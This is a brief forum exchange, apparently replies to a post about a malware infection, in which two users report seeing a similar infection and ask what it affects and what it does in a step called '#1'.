I had this same issue. Do you know (by any chance) what gets really affected with this infection?

@walkingmiller

Hello!

Looks like I have come across something very similar (seems to have mutated the specifics a bit). Did you ever figure out exactly what it is trying to do in #1 or other details?

Thank you!
